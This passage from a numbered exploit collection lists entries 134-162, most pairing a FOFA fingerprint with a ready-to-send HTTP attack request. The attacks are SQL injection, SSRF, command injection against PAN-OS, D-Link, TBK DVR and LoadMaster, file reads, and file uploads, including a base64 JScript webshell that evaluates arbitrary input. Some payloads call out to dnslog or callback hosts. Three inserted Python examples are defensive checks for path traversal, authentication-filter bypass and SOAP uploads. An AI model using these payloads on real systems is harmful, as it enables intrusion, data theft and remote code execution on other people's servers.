jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

The injection point is the IPAddr field inside the JSON string nested in messagecontent; the error-based updatexml() call returns the database version in the error message.

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The /api/cors/ proxy fetches the URL given in the path; a DNS lookup for the dnslog hostname confirms the server-side request.

137. Fujian Kelixun (科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

All four Kelixun endpoints (137-140) are time-based blind injections: a response delayed by about 5 seconds confirms the SLEEP(5) executed.

141. Fujian Kelixun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

Union-based: the response contains ~c4ca4238a0b923820dcc509a6f75849b~ (md5(1) wrapped in the 0x7e tildes) when the injection works.

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
Default credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= is "id"); the passwd value YWJjMTIzNDVjYmE is the base64 of abc12345cba, the fixed password of the built-in mydlinkBRionyg account used by the PoC.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-host>`;
Accept-Encoding: gzip

The SESSID cookie value is used as a file path: the traversal drops a file whose name contains a backtick-quoted command into the device telemetry directory, and ${IFS} stands in for the space the file name cannot contain. Replace <dnslog-host> with your own callback host.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

The url value is base64 for rtsp://a and transport URL-decodes to || (echo '[S]'; id; echo '[E]')#; so the output of id appears between [S] and [E] in the response.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

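The traversal requests in entries 126, 129, 132 (CVE-2024-27199), 145 and 147 all rely on the server resolving `..` after it has already decided which directory the path belongs to. The following is an added example, not code from the original post or from any of the products above: it normalises a request path the way a correct static-file handler must (percent-decode, fold backslashes, collapse dot segments) and reports whether the result still lies under the prefix the request was made to. The prefixes and sample paths are constructed for the example; the `/pms/logs/` prefix used for the ColdFusion case is an assumption, not the product's real layout.

```python
import posixpath
from urllib.parse import unquote

# Constructed (prefix, requested path) pairs modelled on entries 126, 129,
# 132 and 147 above; not captured traffic. "/pms/logs/" is an assumed log
# directory for the ColdFusion case.
SAMPLE_PATHS = [
    ("/static/", "/static/../../../../../etc/passwd"),
    ("/pms/logs/", "/pms/logs/../../../../../../../etc/passwd"),
    ("/res/", "/res/../admin/diagnostic.jsp"),
    ("/.well-known/acme-challenge/", "/.well-known/acme-challenge/../../admin/diagnostic.jsp"),
    ("/webeditor/", "/webeditor/../../../windows/win.ini"),
    ("/webeditor/", "/webeditor/%2e%2e/%2e%2e/windows/win.ini"),
    ("/static/", "/static/css/site.css"),
]


def normalise(path: str) -> str:
    """Resolve a request path the way a correct file handler must before it
    touches the filesystem: percent-decode twice (to catch %252e), fold
    backslashes (Windows hosts such as RaidenMAILD accept both separators),
    anchor at '/', then collapse '.' and '..' segments."""
    decoded = unquote(unquote(path)).replace("\\", "/")
    if not decoded.startswith("/"):
        decoded = "/" + decoded
    return posixpath.normpath(decoded)


def escapes(prefix: str, path: str) -> bool:
    """True when the normalised path no longer sits inside `prefix`."""
    norm = normalise(path)
    base = posixpath.normpath(prefix)
    if base == "/":
        return False
    return norm != base and not norm.startswith(base + "/")


def has_dot_segments(path: str) -> bool:
    """Browsers never emit '.' or '..' segments, so one in a raw request line
    (or, as in entry 145, in a cookie value) is itself worth an alert."""
    decoded = unquote(unquote(path)).replace("\\", "/")
    return any(seg in (".", "..") for seg in decoded.split("/"))


def classify(samples=SAMPLE_PATHS):
    """Return [(path, escapes_prefix)] for each sample."""
    return [(path, escapes(prefix, path)) for prefix, path in samples]


if __name__ == "__main__":
    for path, bad in classify():
        print(("ESCAPES " if bad else "inside  ") + path)
    # The PAN-OS cookie value from entry 145 also carries dot segments:
    print(has_dot_segments("/../../../opt/panlogs/tmp/device_telemetry/minute/x`curl${IFS}h`;"))
```

The second decoding pass and the backslash fold matter: a handler that checks the prefix before decoding, or only understands forward slashes, passes the `%2e%2e` and `..\` variants that fail the plain `..` check.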
148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The validationRules script is evaluated server-side and its return value (the command output, ipconfig here for Windows hosts) comes back in the response.

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

Same request as 149 with id instead of ipconfig; the ;swagger-ui/ suffix is what lets the request past the authentication filter.

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

The request as listed only shows the unauthenticated reach to pageList through the ;swagger-ui/ path trick; the injected parameter itself is not included.

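Entries 149-151 reach protected handlers by inserting `;swagger-ui/` into the path, and entry 132 uses the same trick (`/app/rest/users;.jsp`) on a forwarded path: the authentication check matches on the raw request URI while the framework routes on the path with `;`-parameters removed. The following is an added example, not AJ-Report or TeamCity code: a deliberately naive allow-list check beside a corrected one that canonicalises the path first. The allow-list, the set of protected routes and the sample URIs are assumptions made for the illustration.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Assumed routing table for the illustration: what the app serves without a
# login and which handlers must stay behind authentication.
PUBLIC_PREFIXES = ("/swagger-ui/", "/login")
PROTECTED = {"/dataSetParam/verification", "/dataSource/pageList"}

# Constructed request URIs modelled on entries 149-151; not captured traffic.
SAMPLES = [
    "/dataSetParam/verification;swagger-ui/",
    "/;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1",
    "/swagger-ui/index.html",
    "/dataSetParam/verification",
]


def canonical_path(uri: str) -> str:
    """The path the framework actually dispatches on: query dropped, each
    segment percent-decoded and cut at its first ';' (matrix/path parameter),
    empty segments removed, dot segments collapsed."""
    segments = [unquote(seg).split(";", 1)[0] for seg in urlsplit(uri).path.split("/")]
    return posixpath.normpath("/" + "/".join(s for s in segments if s))


def is_public_naive(uri: str) -> bool:
    """The broken check: a substring match on the raw request URI."""
    return "swagger-ui" in uri or uri.startswith("/login")


def is_public_fixed(uri: str) -> bool:
    """The corrected check: exact prefix match on the canonical path."""
    path = canonical_path(uri)
    for prefix in PUBLIC_PREFIXES:
        clean = prefix.rstrip("/")
        if path == clean or path.startswith(clean + "/"):
            return True
    return False


def outcome(uri: str, is_public) -> str:
    """What a request reaches when the auth filter uses `is_public` and the
    router uses the canonical path."""
    path = canonical_path(uri)
    if path in PROTECTED and is_public(uri):
        return "BYPASS " + path
    return "ok"


def audit(is_public, samples=SAMPLES):
    return [(uri, outcome(uri, is_public)) for uri in samples]


if __name__ == "__main__":
    for label, check in (("naive", is_public_naive), ("fixed", is_public_fixed)):
        for uri, result in audit(check):
            print(f"{label:5} {result:35} {uri}")
```

The fix is not a better substring: the filter must look at the same string the router will use, which means stripping `;` parameters and dot segments before any allow-list comparison.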
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA), <= 7.2.54.8 (LTSF), <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 of ';ls;':doesnotmatter, i.e. the Basic-auth username is a shell fragment and the password is ignored.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into its temporary file cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

The injection point is the gsdwid field of the JSON body; PG_SLEEP shows the backend is PostgreSQL, and a response delayed by about 5 seconds confirms it.

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Open the file path echoed back in the response, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php (the stored name is generated server-side)

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected: TBK DVR-4104, TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc value URL-decodes to echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt; so the marker asrgkjh0 in the response confirms execution. The Cookie: uid=1 header is required.

157. Meite (美特) CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded body is only a random marker string (nyhelxrutzwhrsvsrafb); the check is that it is served back from http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
CVE-2024-32640 is assigned to Masa CMS, the maintained fork of Mura CMS, which is why the fingerprint below matches on "Masa CMS"; the same endpoint appears again as entry 187 with a time-based payload.
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
The jobUpload SOAP method takes a file name in <fileName> and the base64-encoded file body in <bufValue>; the body below is a JScript web service that evaluates its Pass parameter.
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

Then call the uploaded web service:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and arbitrary file read
CVE-2024-4956
Affects Nexus Repository 3 (OSS and Pro) up to 3.68.0; fixed in 3.68.1. The traversal is carried in the percent-encoded path, so a proxy that only inspects the decoded request may miss it.
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 (KeyTop smart parking fee system) Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> element sets the file name (traversal in it moves the file out of the upload folder) and <fileFlow> carries the file content, which must be base64-encoded. The value shown decodes to a harmless 20-character marker string.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the written file:
http://x.x.x.x/dizxdell.aspx

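Both entry 159 (INFINITT WebJobUpload, <fileName> plus base64 <bufValue>) and entry 161 (科拓 Webservice.asmx, <fileName> plus base64 <fileFlow>) are SOAP uploads whose file body is base64 text. The following is an added example (not code from the original write-up or from either vendor) that a reverse proxy or WAF hook could run over such a body: it decodes the payload, flags traversal in the file name and flags a server-side executable extension. Only the element names are taken from the page; the pairing table, the extension list, the function names and the sample bodies are this example's own.

```python
# Added example (not the vendors' code): inspect a SOAP upload body of the kind
# shown in entries 159 and 161, decode the base64 payload and flag traversal in
# the file name or an executable extension. Element names come from the page;
# UPLOAD_FIELDS, EXEC_EXTS and the samples are constructed for this example.
import base64
import posixpath
import xml.etree.ElementTree as ET

# (file-name element, base64 content element) pairs seen in the two requests
UPLOAD_FIELDS = [("fileName", "bufValue"), ("fileName", "fileFlow")]
# extensions that execute server-side on the hosts these products run on
EXEC_EXTS = {".aspx", ".asmx", ".ashx", ".asp", ".soap", ".php", ".jsp"}


def _local(tag: str) -> str:
    """Strip the namespace from an ElementTree tag such as '{http://rainier}fileName'."""
    return tag.rsplit("}", 1)[-1]


def inspect_soap_upload(body: str) -> dict:
    """Return a verdict dict for one SOAP body. 'suspicious' is True when the
    file name traverses directories or ends in an executable extension."""
    root = ET.fromstring(body)
    texts = {_local(el.tag): (el.text or "") for el in root.iter()}
    for name_tag, data_tag in UPLOAD_FIELDS:
        if name_tag in texts and data_tag in texts:
            filename = texts[name_tag]
            content = base64.b64decode(texts[data_tag], validate=True)
            unix_name = filename.replace("\\", "/")
            traversal = ".." in unix_name.split("/")
            executable = posixpath.splitext(unix_name)[1].lower() in EXEC_EXTS
            return {
                "filename": filename,
                # where a naive server would place the file relative to its upload root
                "resolved": posixpath.normpath("/" + unix_name),
                "content": content,
                "traversal": traversal,
                "executable": executable,
                "suspicious": traversal or executable,
            }
    return {"suspicious": False}


# Constructed sample: the KeyTop request body from the page, verbatim.
SAMPLE_KEYTOP = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>"""

# Constructed benign sample in the INFINITT jobUpload shape (a PDF header).
SAMPLE_BENIGN = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>
<jobUpload xmlns="http://rainier"><fileName>report.pdf</fileName><bufValue>JVBERi0=</bufValue></jobUpload>
</soap:Body></soap:Envelope>"""

if __name__ == "__main__":
    for body in (SAMPLE_KEYTOP, SAMPLE_BENIGN):
        verdict = inspect_soap_upload(body)
        print(verdict.get("filename"), "suspicious:", verdict["suspicious"])
```

The same check belongs in the application itself: reject any file name containing a path separator, and never derive the on-disk path from client input.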
162. 和丰多媒体信息发布系统 (Hefeng multimedia information publishing system) QH.aspx arbitrary file upload
